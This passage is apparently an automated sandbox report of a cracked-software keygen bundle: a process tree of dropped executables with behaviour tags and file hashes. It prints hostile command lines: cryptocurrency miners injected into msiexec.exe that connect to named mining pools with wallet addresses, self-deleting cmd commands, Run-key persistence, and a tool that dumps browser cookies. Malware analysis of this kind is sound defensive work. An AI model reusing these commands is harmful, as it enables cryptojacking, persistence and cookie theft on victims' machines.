C:\Users\Admin\AppData\Roaming\24C.tmp.exe"C:\Users\Admin\AppData\Roaming\24C.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:60 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\24C.tmp.exe"5⤵PID:5592
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5812 -
C:\Users\Admin\AppData\Roaming\1A1B.tmp.exe"C:\Users\Admin\AppData\Roaming\1A1B.tmp.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:904 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w14456@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999995⤵PID:4996
-
C:\Windows\system32\msiexec.exe-o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w23936 --cpu-max-threads-hint 50 -r 99995⤵
- Blocklisted process makes network request
PID:364 -
C:\Users\Admin\AppData\Roaming\1AA9.tmp.exe"C:\Users\Admin\AppData\Roaming\1AA9.tmp.exe"4⤵
- Executes dropped EXE
- Drops startup file
PID:5368 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL4⤵PID:3340
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:5164 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3320 -
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install5⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:188 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4548 -
C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1640 -
C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"6⤵
- Executes dropped EXE
PID:5560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 247⤵
- Program crash
PID:5412 -
C:\Program Files (x86)\Browzar\Browzar.exe"C:\Program Files (x86)\Browzar\Browzar.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:4708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 22526⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\GloryWSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\GloryWSetp.exe"4⤵
- Executes dropped EXE
PID:3320 -
C:\Users\Admin\AppData\Roaming\5801742.exe"C:\Users\Admin\AppData\Roaming\5801742.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4688 -
C:\Users\Admin\AppData\Roaming\2625955.exe"C:\Users\Admin\AppData\Roaming\2625955.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5080 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵
- Executes dropped EXE
PID:1252 -
C:\Users\Admin\AppData\Roaming\5191048.exe"C:\Users\Admin\AppData\Roaming\5191048.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4512 -
C:\Users\Admin\AppData\Roaming\5191048.exe"{path}"6⤵
- Executes dropped EXE
PID:1772 -
C:\Users\Admin\AppData\Roaming\2600165.exe"C:\Users\Admin\AppData\Roaming\2600165.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3520 -
C:\Users\Admin\AppData\Roaming\2600165.exe"{path}"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1708 -
C:\Users\Admin\AppData\Roaming\1597176.exe"C:\Users\Admin\AppData\Roaming\1597176.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3696 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe6⤵PID:5652
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe6⤵
- Suspicious behavior: EnumeratesProcesses
PID:5644 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\note8876.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\note8876.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\hbggg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\hbggg.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5316
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:356
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2476
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4624
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2104
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5136
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
54a8641614f11b699f50d96ead93ef70
SHA1b7993d550bb46d49a5a3577a554efd752d347a93
SHA256f9027efe8b397769aaf1a9e8f214ccc768dbd9932f60422302c39a200b4f93f0
SHA512448c5145829a45b3743f5ac293d49314c989956a702c4398399df745b55651216c6b1a0d5fa687287bd881d87a786e7938ece358e375bd9660f69a9bf66d1fa2
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e